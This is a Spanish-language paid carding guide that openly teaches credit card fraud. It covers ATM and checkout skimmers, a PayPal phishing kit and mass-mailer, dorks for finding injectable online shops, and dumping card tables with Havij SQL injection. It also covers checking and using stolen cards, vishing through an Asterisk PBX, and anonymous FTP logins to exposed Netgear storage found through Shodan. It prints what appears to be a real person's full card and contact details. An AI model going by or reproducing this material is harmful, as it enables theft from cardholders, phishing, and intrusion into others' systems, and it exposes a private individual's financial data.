GRACIAS POR TU COMPRA DISFRUTA DE NUESTROS DOCUMENTOS PUEDES

SEGUIRLEYENDOYAPRENDIENDOCONNOSOTROS.

(
C
READOPORELCLUBCOMPUTACIONALDELMAL
)

AUTOR:KELVINPARRAVENEZUELASISTEMAS

http://kelvinparrasecurityinformation.blogspot.com/
fanpage:KelvinSecurity
Twitter:nationgoverment

w w w . b a c t e r i a s . m x

DEFINICIN:

GRACIAS POR COMPRAR ESTE DOCUMENTO AHORA COMENZAMOS, LOS PIRATAS

INFORMTICOS SON AQUELLOS QUE BUSCAN SACARLE ALGN PROVECHO CON LAS
TCNICAS QUE SE APRENDEN DE HECHO SABEMOS QUE MS DEL 70% DE LLAMADOS
AUDITORES DE SEGURIDAD HAN HECHO CARDING ALGUNA VEZ. EL CARDING ES
UTILIZADO CON EL FIN DE GANAR DINERO $USD HOY EN DIA PENADO DE 8 A 12 AOS
DE PRISIN.
LOS ROBOS MILLONARIOS Y A INDIVIDUOS QUE NAVEGAN USUALMENTE EN INTERNET
Y BUSCAN COMPRAR ARTCULOS EN PGINAS VULNERADAS POR DELINCUENTES
INFORMTICOS SE HA DEMOSTRADO QUE TCNICAS SON MUCHAS PERO YA COMO
SABRAS TODO A SU LMITE LA EMPRESA SIEMPRE BUSCAR LA FORMA DE LLEVARLA
PROTECCION Y ORIENTACION DE CONSEJOS PARA PREVENIR QUE UN CARDER
LLEGUE HASTA SU BILLETERA VIRTUAL.
IMPORTANTE:
NIVEL 1 > CARDING ROBO DE TARJETAS DE CRDITO POR INTERNET UTILIZANDO
MTODOS DE VULNERACIN DE PGINAS.
NIVEL 2 > skimmers ESTAFANDO AL USUARIO Y A SU TARJETA DE DBITO.
NIVEL 3 > CASANDO USUARIOS Y ENVIANDO SCAMS.
NIVEL 4 > LAVADO DE DINERO UTILIZANDO CUENTAS GRANDES Y CUENTAS FALSAS
NIVEL 5 > COMERCIO ELECTRNICO CON OTROS CARDERS INTERCAMBIO DE
TARJETAS DE CRDITO EN FOROS.

Skimmers capturando la tarjeta y el pin:

SEGURO TE PREGUNTARAS QUE COMO O DONDE PUEDO CONSEGUIR EL HARDWARE

NECESARIO PARA MONTAR EL SKIMMERS EN EL CAJERO AUTOMTICO PUES PUEDE
ADQUIRIR LOS COMPONENTES EN ALIBABA:
http://www.alibaba.com/productsdirectory/recommendedcardskimmersatm.ht
ml
COMPONENTES:

CAPTURADOR DE TARJETA: TIENE FUNCIN DE UN LECTOR DE TARJETA, UN BOTN

DE RESETEO Y ESTADO DE LED.

w w w . b a c t e r i a s . m x

proceso de la captura de la tarjeta y pin.

1) Duplicada dispositivo de lectura de tarjetas coloca sobre uno ya existente
2) Dispositivo lee la tarjeta mientras que unos registros cmara oscura que la
introduccin del PIN
3) DISPOSITIVO extraerse y acoplarse a un ordenador porttil para descargar
Detalles CARD

Mtodo de adaptacin del lector de tarjeta:

Detalle: La remocin de un dispositivo de duplicado de la ranura de lector de

tarjetas, los dispositivos se ajust sobre la garganta lector de tarjeta.

ATM Camara:

w w w . b a c t e r i a s . m x

Vamos a quitar la pieza para ver de cerca:

Incorporacin de:
camara y bateria

Vamos a echar un vistazo en el lado interno. Una cmara del telfono mvil se
utiliza como un dispositivo de captura de PIN, siendo la informacin transmitida a
travs de un dispositivo inalmbrico.

Skimmers Por Punto De Pago

DESCRIPCIN:

Recientes noticias locales sobre skimmers de tarjetas de crdito que se

encuentran en cajas registradoras de autoservicio Walmart en algunos lugares me
recuerda a un argumento de venta penal que vi hace poco para skimmers
superposicin hechos especficamente para los mismos terminales de tarjetas.

ADICIONAL: YA SABES EL MISMO MTODO UN LECTOR DE TARJETA Y UN

CAPTURADOR DE PIN DE MANERA POCO MAS SOTISFICADA QUE LOS SKIMMERS EN
CAJEROS AUTOMATICOS PERO LA MISMA FUNCIN.

Disparando scams de paypal:

MEDIANTE HERRAMIENTAS DE HACKING Y VISUALIZANDO FOROS CARDING LOS

NUEVOS INGRESOS AL NEGOCIO DE LA MAFIA VIRTUAL PUEDE COMENZAR A DAR SUS
FRUTOS SI COMENZASTE DE 10$ DOLARES AHORA LO PUEDES CONVERTIR A 500$
DOLARES SIN TRABAJAR Y ESFORZARTE COMO TUS VICTIMAS AHORA TIENES LA
POSIBILIDAD DE ENTRAR EN ESTE NEGOCIO SIMPLEMENTE CONTACTANDO HACKERS
Y LUEGO DE HABER TENIDO TU MINIMO INGRESO DE 500$ DOLARES PUEDES
PAGARLE A UNO PARA QUE TE LOS MULTIPLIQUE Y HACER NEGOCIOS EN ROBO
MASIVO DE BANCOS Y PGINAS SHOPPING DONDE MANEJEN MUY BIEN LAS TARJETAS
DE CRDITO Y DONDE TENGAMOS ACCESO A CREDENCIALES DE PAYPAL Y OTRAS
PAGINAS PAYMENT.

SI ASI PIENSA UN CARDER DE ALTO RANGO Y QUE HOY EN DIA MANEJA EUROS Y
DOALRES RECUERDA NO MAL GASTARTE EL DINERO , SI GANAS UNA BUENA
"CANTIDAD" , "INVIERTE" PUES DEBES PENSAR COMO TODO UN EMPRESARIO.
VPN: EL VPN NOS MANTIENE EN EL ANONIMATO SI SOMOS DE PAISES COMO
VENEZUELA Y LA CUENTA ESTA EN EL EXTERIOR COMO CANADA PODRAMOS
UTILIZAR UNA VPN Y HACER NUESTRA FECHORIA PARA EVITAR QUE NOS ATRAPEN
PERO MUCHOS SE PREGUNTAN A DONDE VA EL DINERO, POR QUE SI LAS
AUTORIDADES SABEN LA DIRECCION Y A NOMBRE DE QUIEN VA EL DINERO PUES ALLI
SI EL NEGOCIO DEJA DE SER NEGOCIO.
PAGINAS QUEMADAS: SI, ASI COMO DICE ALLI "PAGINAS QUEMADAS" AVECES UN
CARDER CON EXPERIENCIA DE HACKER TE DIRA "DEBES BUSCAR DORKS Y
INJECTARLAS POR MEDIO DE SQL INJECTION CON UNA HERRAMIENTA QUE TODOS
USAMOS HAVIJ" , LA HERRAMIENTA HAVIJ ES UNA HERRAMIENTA QUE TE PERMITIRA
OBTENER LOS DATOS DEL SERVIDOR QUE SE ENCUENTRA VULNERABLE.

MUY BIEN, VAMOS ENTENDIENDO COMO VA TODO Y AHORA TE DARE INSTRUCCIONES

DE COMO DESCARGARTE ESA VPN , DE HECHO EXISTEN VPN SIN TANTOS LIMITES
QUE "FUERON GRATUITAS" PUES YA NO LA SON Y DEBES PAGAR CIERTA CANTIDAD
PARA DARTE ACCESO A OTRAS CONEXIONES DE OTRO PAISES.
EN SOFTWARE:
http://www.packetix.net/
http://hotspotshield.com/
http://cyberghostvpn.com/
http://www.ultravpn.fr
http://torvpn.com/
http://www.securitykiss.com/
EN EXTENSIONES:
Unlimited Free VPN Hola
DotVPN better than VPN.
ZenMate VPN
Hotspot Shield Free
Gom VPN
TunnelBear VPN

PUEDES TAMBIN NAVEGAR ANONIMAMENTE CON EXTENSIONES CHROME O FIREFOX.

Y DESPUES..

BIEN A CONTINUACIN DEBEMOS TENER CLARO QUE NOS ARRIESGAMOS A TODO

ESTE AO 2016 EXISTEN MTODOS PERO CADA AO O MES LA SEGURIDAD
EVOLUCIONA DE MANERA QUE TRATAN DE HACERLE LA VIDA CUADRITOS A LOS
PIRATAS.
1)
COMO OBTENER CUENTAS PAYPAL DE MI VICTIMA:
"ANTES QUE TODO UN SALUDO AMI AMIGO OMAR Y SU BLOG OMAR BACKTRACK POR
EL SCAM"

REQUISITOS:
1) UN SITIO WEB A TU DISPOSICIN
2) EL SCAM DE PAYPAL
3) UNA IMAGEN ENGAOSA

BIEN, YO TENGO MI SERVIDOR A MI DISPOSICIN CON UNA WEB SHELL QUE ME

PERMITE SUBIR LOS FICHEROS NECESARIOS DEL SCAM.
1) VAMOS Y DESCARGAMOS EL "SCAM" POR LA DIRECCIN URL DE MEDIAFIRE
PRESTADA POR NUESTRO AMIGO OMAR.

DESCARGAR:
http://www.mediafire.com/download/d9ep6so990ywc01/Scam+Paypal+2014+%2B+
Mailer+%2B+Letller.rar
MUY BIEN, AHORA UNA VEZ DESCARGADOS OBSERVARAS FICHEROS COMO LOS
SIGUIENTES EN EL .RAR

EXPLICACION DE CADA FICHERO:

1) EL "MAILER" ES EL STMP BOMBER O EMAIL BOMBER PARA ENVIAR MASIVOS ENVIOS
DE MENSAJES ADICIONAL DE CODIGO HTML PARA LLEVAR LA CAPTURA DE LA
CONTRASEA MUCHO MAS RAPIDO.
2) EL LETTERPP , ESTE CODIGO EN HTML OBTIENE EL CODIGO QUE SERA ENVIADO A
TU VICTIMA PERO DEBES CORREGIR ANTES ESE CODIGO, SE TRATA DE UNA IMAGEN
CON UN VINCULO A TU SCAM.
EJEMPLO DEL CODIGO Y TU PAGINA DONDE HAS SUBIDO EL SCAM.
DIGAMOS QUE ESTE ES TU PORTAL WEB: WWW.PAYPALSCAM.COM
ESTE ES EL CODIGO EN HTML:
<a
href="ACA
EL
SCAM
URL"><img
src="
http://s27.postimg.org/vvnxpiy9v/Gg_Hp6.png
" /></a></p>"

alt=""

BIEN AADES LA DIRECCIN DONDE ESTA EL SCAM Y LO GUARDAS PARA ELLO SE

VERA UN MENSAJE AS EN EL ENVI DEL MENSAJE.

UN CLICK EN LA IMAGEN Y TE REDIRECCIONA AL SCAM.

UNA VEZ DE HABER SUBIDO LOS FICHEROS POR CIERTO LOS FICHEROS SE
ENCUENTRAN EN LA CARPETA DEL RAR LLAMADA "hi" ESOS FICHEROS DEBERS SUBIR
AL SERVIDOR.

UNA DE LAS COSAS QUE DEBES CONOCER ES QUE EN LA CARPETA "Rezult" DEL SCAM
ES DONDE PODRS VER LAS CONTRASEAS QUE HAN CADO DE TU VICTIMA.
AHORA NECESITAMOS EL STMP BOMBER O EMAIL BOMBER QUE ES EL FICHERO EN
PHP LLAMADO "MAILER" LO SUBIMOS AL SERVIDOR.

ENVIANDO SPAM:

EN YOUR EMAIL:
COLOCAR UN EMAIL PERSONALIZADO DE LA EMPRESA PAYPAL
EN REPLY TO:
LO DEJAMOS EN PAYPAL SECURITY
EN SUBJECT:
CHECK ACCOUNT PAYPAL
EN MESSAGE:
COLOCAMOS EL HTML QUE MODIFICAMOS EN LETTERUP
Y A LADO INCORPORAMOS LA LISTA DE CORREOS QUE QUEREMOS ENVIAR ESOS
SCAMS

AHORA SOLO QUEDA ESPERAR A QUE SUS VCTIMAS CAIGAN EN EL SCAM.

PARA CHECAR A TUS VICTIMAS ES DECIR DIGAMOS QUE TENEMOS UN GMAIL O
HOTMAIL O YAHHO PODRIAMOS CHECAR EL EMAIL CON HERRAMIENTAS QUE
CONSULTAN TAL DIRECCION DE CORREO ELECTRONICO PARA AFIRMARTE QUE EL
USUARIO SI ESTA REGISTRADA EN DICHA PAGINA.

EBAY
AMAZON
PAYPAL

Script Amazon
checker
:pastebin.com/
cdfuGFHK
script paypal
checker
:pastebin.com/
ZGUGeEQG
script ebay
checker

:pastebin.com/
kkC2aAmY
IMPORTANTE:NO SE ENVIAR MENSAJES A LOS CORREOS DESTINADOS SI NO ESTA
INSTALADO EL STMP AL SERVIDOR.

Buscando Tarjetas De Credito Y Exploits:

PERSONAS RECIN INGRESADAS EN CARDING QUE NO SABEN BUSCAR MUY BIEN

NUEVAS VULNERABILIDADES QUE LES PROPORCIONE INFORMACIN DE LAS TARJETAS
DE CREDITO Y CUENTAS PAYPAL PARA SER UTILIZADAS EN OTRAS PGINAS.
Vulnerabirilidades conocidas en la web:

1) POR MEDIO DE SQL INJECTION EXTRAER LA BASE DE DATOS DE LAS PAGINAS

STORE VISUALIZAR LAS TABLAS, COLUMNAS HASTA LLEGAR A LOS DATOS
BASICO DE LO QUE DEBEMOS SACAR SERIA:

NOMBRE
DIRECCION
CIUDAD
PAIS
SSN
CC
CVV
FECHA DE EXPIRACIN

IMPORTANTE:
Muchas paginas utilizan productos como mod_security o cloudflare
que impiden al atacante realizar alguna accion en contra del servidor existen
metodos que solo se trata de extraccion de datos por medio de directorios o
ficheros que este a la vision de un hacker o pirata los metodos sql injection, file
inclusion de manera automatizada no funciona muy bien, es aconsejable en
algunas paginas realizar acciones de forma manual.

Realizando Bsqueda De Pginas Vulnerables Con Dorks:

LOS METODOS POR DORKS PUEDEN SER EFICIENTES Y A LA VEZ UN PROBLEMA Y ES

QUE ES UN PROBLEMA GENERAL Y DE MUCHOS QUE COMIENZAN EN ESTO ESO SE
DEBE A QUE MUCHOS USUARIOS SE ENCUENTRAN UTILIZANDO LAS MISMAS DORKS Y
QUEMANDO LAS TARJETAS DE CREDITO.

listado

inurl:".php?id=" intext:"add to cart"

inurl:".php?id=" intext:"shopping"
inurl:".php?id=" intext:"boutique"
inurl:".php?id=" intext:"/store/"
inurl:".php?id=" intext:"/shop/"
inurl:".php?id=" intext:"toys"
inurl:".php?cid="
inurl:".php?cid=" intext:"shopping"
inurl:".php?cid=" intext:"add to cart"
inurl:".php?cid=" intext:"Buy Now"
inurl:".php?cid=" intext:"View cart"
inurl:".php?cid=" intext:"boutique
inurl:".php?cid=" intext:"/store/"
inurl:".php?cid=" intext:"/shop/"
inurl:".php?cid=" intext:"Toys"
COMO EJEMPLO UTILIZAR LA HERRAMIENTA HAVIJ ES UNA HERRAMIENTA
AUTOMATIZADA SU VENTAJA ES SER RPIDA EN INYECCIONES Y GUARDA LOS
FICHEROS ORGANIZADAMENTE EN HTML ADEMS DE PODER ABRIR VARIAS VENTAJAS
Y ESTA ESTAR DUMPEANDO DATOS SIN NINGN PROBLEMA QUE LA OTRA EST
ABIERTA.
PARA DESCARGAR LA HERRAMIENTA:
IR A LA DIRECCIN:
http://cadivi.us/milw0rm/ DONDE PODRAS DESCARGAR LA
HERRAMIENTA.

UNA VEZ VERAS HAVIJ PRO Y LA CONTRASEA DEL RAR ES havijpro ADEMAS
VERAS HERRAMIENTAS COMO PAYPAL CHECKER Y PARA PROBAR LAS TARJETAS DE
CREDITO CON MONTOS DE 10$
ADEMAS DE OTRAS HERRAMIENTAS QUE
INCORPORAMOS TRAS LA CREACION DE ESTE ARTICULO.
AHORA VAMOS A TESTEAR UNA PAGINA PARA DEMOSTRAR COMO PODEMOS ROMPER
LA VULNERABIRILIDAD SI NO SABES USAR HAVIJ TE ACONSEJAMOS VISITAR BLOGS O
CANALES DE VIDEO EN LINEA PARA VER EL PROCESO DE INJECTION Y ADEMAS
INCORPORAR OTRAS TECNICAS.

UNA VEZ DE HABER INGRESADO EL TARGET CLICKEAS EN

ANALYZE Y ESPERAMOS
A QUE NOS DE
CURRENT DB
Y EL NOMBRE DE LA BASE DE DATOS LUEGO VAMOS A

TABLES
Y LUEGO
GET TABLES
.

UNA VEZ QUE NOS DA LA LISTA DE TABLAS AHORA TENDREMOS QUE BUSCAR DONDE
ESTAN UBICADAS ESAS TARJETAS DE CREDITO MUCHAS VECES ESTAN EN
ORDERS
,

SHIPPING DETAILS
PERO ACA ESTA EN
BILLINGS
.

YA SABEMOS QUE ESCOGER:

CC_VISA,CC_NAME_ON_CARD,CC_CVC,CC_NUMBER_CC_EXPIRE_MONTH,CC_EXPIRE
YEAR

EN CASO DE ESTA PAGINA LANZA PRIMERO LAS VIEJAS Y AL ULTIMO MOMENTO SACA
LAS DEL 2016 Y UNAS QUE OTRAS LA CVC QUE NECESITAREMOS COMO CDIGO DE
TARJETA.

AHORA QUE TENGAMOS NUESTRA TARJETA DE CREDITO NO SABEMOS QUE TIPO DE

TARJETA ES MASTERCARD O VISA POR LO TANTO VAMOS A LA SIGUIENTE
DIRECCION:
http://www.elfqrin.com/hacklab/pages/discard.php
EN LA PARTE INFERIOR DE LA PAGINA EXISTE UN CHECK CC PARA VALIDAR QUE SI
TIENE 16 DIGITOS PUEDE SER MASTERCARD.

VEMOS QUE SI ES MASTERCARD EL CODIGO DE SEGURIDAD PUEDE SER DE 3 DIGITOS,

VAMOS A NUESTRA PAGINA
http://cadivi.us/milw0rm/ccchecker.php
Y
CHECKAMOS UN PAGO PARA VER SI PASA LA TARJETA.

EN CASO DE ESTA TARJETA YA ESTA INACTIVA YA QUE LA HEMOS QUEMADO Y

PASADO POR DISTINTAS PAGINAS.

address
city
cccode

zip
email phone ccname
country

cctypeccnumber

cexpdate

822 N. Turnbull Dr. Metairie

70001 misslouisianaintl2016@gmail.com
5045794918 Christina Famularo MC
5219800091844174 01/18 037 United
States

Pago En Linea:

EXISTEN DISTINTAS PAGINAS QUE SOLO PUEDES COMPRAR CON LA CC Y SU FECHA

DE EXPIRACION EN CASO DE AMAZON HA FUNCIONADO DE ESA FORMA PERO YA
MUCHAS LAS CUENTAS RECIEN CREADAS HAN SIDO CANCELADAS POR COMPRAR CON
TARJETAS DE CREDITO DE PERSONAS CATEGORIZADA POR ESTAFA ELECTRONICA.

Phishing Con Asterisk PBX:

Jay Schulman EN UNA CONFERENCIA DE LA BLACKHAT EXPLICA LA

CONFIGURACIN DEL ASTERISK PARA REALIZAR LLAMADAS A VCTIMAS
CASUALMENTE SON VCTIMAS DE BANCOS Y SEGUROS TODO PARA TENER ACCESO A
TARJETAS DE CRDITO O INFORMACIN DE USUARIO Y CONTRASEA, SE TRATA DE

UNA GRABADORA ROBOTIZADA Y MODIFICACIN DE DEL AUDIO UTILIZANDO

SOFTWARE CON DISTINTOS PLUGINS DE ESTUDIOS DE GRABACIN PARA CONVERTIR
LA VOZ.
EL FBI SE DEDICA A ESTE TIPO DE TRABAJOS BUSCA AL PERSONAL DEDICADO A LA
DECODIFICACIN DE AUDIO CUANDO SE TRATA DE UN .WAW QUE SEA UTILIZADO EN
TERRORISMO O SIMPLEMENTE EN ESTAFAS ELECTRNICAS QUE PODRA AYUDAR AL
FBI A CONCLUIR QUIN ES LA PERSONA ESTAFADORA.

CUANDO LLEGA UN MENSAJE DE EMAIL A LOS USUARIOS DE MASTERCARD DONDE

REQUIERE AL USUARIO QUE LLAME A UN NUMERO DONDE NO INCLUYE EL
800
QUE
ES UN NUMERO TELEFONICO DE CORPORACIONES COMO EMPRESARIALES OTRA DE
LAS COSAS QUE PODEMOS OBSERVAR ES
Usos de texto a voz para la IVR
OTRA
COSA QUE PODEMOS OBSERVAR ES LA MALA CALIDAD DEL EMAIL Y ES QUE MUCHAS
VECES A LOS STMP SPAMERS SUELEN ENVIAR EN HTML Y RESULTA QUE MUCHOS
PROVEEDORES DE CORREOS ELECTRNICO COMO HOTMAIL O YAHHO SALE ERRNEA
EN CUANTO ES INCORPORACIN DE ESTILOS DE TEXTOS Y IMGENES DENTRO DEL
CDIGO EN HTML.

SMS Vishing:

EL SMS VISHING ES UNA TECNICA DE PHISHING ES MUY USAL CUANDO TE

LLEGAN MENSAJES DE BANCOS Y SUELEN SER PROVEDORES UTILIZADOS POR
EMPRESAS PERO EN CASOS CONTRARIOS EXISTEN OTROS METODOS Y ES INCOPRAR
DIRRECCIONES URL LO CUALES SON PHISHING HAY UNA PROBABILIDAD DE QUE UN

65% DE LAS PERSONAS CON CELULARES CON SISTEMA OPERATIVO ANDROID O

WINDOW PHONE ACCEDAN AL PHISHING.

EJEMPLO

DESCRIPCIN:
EL BSICO FUNCIONAMIENTO DE UNA OPERADORA CON PBX SERIA DE LA SIGUIENTE
FORMA:
1)
2)
3)
4)

USA LLAMADAS 800 EN CORREO ELECTRNICO

PBX RESPONDE LA LLAMADA Y PREGUNTA
PBX GRABA Y TRANSFIERE LLAMADA A EL REAL OPERADOR
OPERADOR RECIBE.

HERRAMIENTAS:
1) PLATAFORMA PBX
2) VOIP NUMERO 800 PROVEEDOR

3) VOIP PROVEEDOR DE SALIDA

4) UNA COMPUTADORA

QUE ES ASTERISK:

WIKI: es un programa de software libre que proporciona funcionalidades de una

central telefnica. Como cualquier PBX, se puede conectar un nmero
determinado de telfonos para hacer llamadas entre s e incluso conectar a un
proveedor de VoIP.

QUE ES TRIBOX:
Trixbox es una distribucin del sistema operativo GNU/Linux, basada en CentOS,
que tiene la particularidad de ser una central telefnica (
PBX
) por software basada
en la PBX de cdigo abierto Asterisk. Como cualquier central PBX, permite
interconectar telfonos internos de una compaa y conectarlos a la red telefnica
convencional (
RTB Red telefnica bsica
). La versin Trixbox CE es la
continuacin de Asterisk At Home
TRIBOX EN WMPLAYER:

VOIP PROVEEDOR:

VANIDAD 800

Como las llamadas VoIP son tan baratos, podemos darnos el lujo de hacer un poco
de llamada telefnica en nombre de la vctima.

BASICA CONFIGURACION:
TRIBOX ADMIN:

CONFIGURACION DE ASTERISK:

EN OBTENER EL 800:

AADIR UN TRUNK A EL ASTERISK

TCNICA DE SEGUIMIENTO BSICO:

1) ADELANTE llamadas de nuestros 800 a un nmero telefnico verdadero
servicio al cliente.
2) Grabar la conversacin de la informacin personal

ROBANDO CREDENCIALES DE NETGEAR CON SHODAN:

ROBAR CREDENCIALES DE DISPOSITIVOS QUE ALMACENAN INFORMACIN

PERSONAL ENTRE ELLA CONTRASEAS BANCARIAS Y CORREOS ELECTRONICOS
ADEMAS DE FOTOGRAFIAS DE TARJETAS DE CREDITO O DEBITO.
ESTADISTICA CANTIDAD:
(
>
) USA: 4,093
(
>
) Italy: 1,331
(
>
) Australia: 1,107
VAMOS A SHODAN COLOCAMOS EL COMANDO
PORT:21 214ADMIN_LOGIN
ENCONTRAREMOS SERVIDORES TENEMOS UN ACCESO AUTORIZADO POR MEDIO DEL
PUERTO 21 .

ACCESO AL DISPOSITIVO

230 User logged in.

Usuario (
IP_VICTIM
:(none)):
anonymous > (CLAVE POR DEFECTO)
230 User logged in.
ftp>
ftp> dir
200 PORT 190.142.93.209:5003 OK
150 BINARY data connection established.
drwxrwxrwx 1 nobody root
0 Aug 2 06:21 .
drwxrwxrwx 1 nobody root
18 Aug 2 06:21
USB_Storage > DIRECTORIO DE
ALMACENAMIENTO.

INFORMACIN QUE PODEMOS ENCONTRAR:

>

EN EL DISPOSITIVO PODEMOS ENCONTRAR MUCHOS DE LOS TIPOS DE DATOS QUE SE

ENCUENTRAN EN LA NUBE.
>
>
>
>
>

DOCUMENTOS
CONTRASEAS
FOTOGRAFAS
BASES DE DATOS
CONTACTOS

drwxrxrx
drwxrxrx
drwxrxrx
drwxrxrx
drwxrxrx
drwxrxrx
drwxrxrx

1
1
1
1
1
1
1

nobody
nobody
nobody
nobody
nobody
nobody
nobody

root
root
root
root
root
root
root

7 May 6 08:57 1Password

4 Mar 28 11:03 Documents
7 Oct 07 2015 El Capitan Tutorials
6 Aug 29 2015 Google Photos Backup
6 May 8 14:09 Hazel Upload
159 Aug 29 2015 Icons
11 Aug 29 2015 Movies

SERA IMPOSIBLE CLONAR TARJETAS CON CHIP:

LAS TARJETAS SE LE HAN IMPLEMENTADO LA INTEGRACIN DE CHIP EN TARJETAS

DE CREDITO Y DEBITO Y FUE INTEGRADA EN TODOS LOS BANCOS PARA OFRECERLES
A SUS CLIENTES MEJOR SEGURIDAD MAYORMENTE PARA EVITAR LOS FRAUDES.

VENTAJAS DEL CHIP:

1) NO ALMACENA INFORMACIN
2) TRANSFIERE LA INFORMACIN
AUNQUE ESTO NO SE SALVA DE LOS FRAUDES ELECTRNICOS QUE ACOSTUMBRAMOS
VER EN INTERNET Y DE LA MISMA FORMA QUE HEMOS DESARROLLADO LA
INTEGRACIN DE SCAMS CON PAYPAL PODEMOS HACERLO CON OTROS BANCOS.
EL CLSICO SON LOS SKIMMERS DE BOLSILLO ES DECIR TRABAJAS EN UNA TIENDA
TOMAS LA TARJETA LA PASAS Y SKIMMER TOMA LA INFORMACIN ESTE PRODUCTO
LO PUEDES ENCONTRAR COMO BARRA ELECTRONICA LECTORA EN PAGINAS DE
VENTA ONLINE.
>
http://es.aliexpress.com/w/wholesalecardskimmer.html
INCORPORADA EN CAJEROS AUTOMTICOS Y LUGARES DE PAGO DE VENTA SE PUEDE
UTILIZAR EL SKIMMER SOLO FUNCIONABA EN TIEMPOS QUE LAS TARJETAS DBITO Y
NO UTILIZABAN CHIPs PERO LAS DE CRDITOS EN ESE TIEMPO SI.

ESTAMOS LLEGANDO AL FINAL

A CONTINUACIN UNA LISTA DE HERRAMIENTAS:

1) SCANNERS WEBS BUSCANDO FALLOS
> VEGAS WEB SCANNER
> ZED ATTACK PROXY
> NETSPAKER SCANNER
> DIRBUSTER
2) TEST DE SQL
> SQLMAP
> HAVIJ
) TEST CARDING
3
> VALIDADOR DE CREDIT CARD
> CHECKER PAYPAL,EBAY,ALIBABA
> BIN GENERADOR
> DORKS
> EXPLOIT_CARDING_SITES
> PROBADOR DE PAYMENT

CARDING NIVEL
1

MTODOS CARDING

CARDING NIVEL 2 > MUY PRONTO.

GRACIAS POR TU COMPRA

TWITTER: @nationgoverment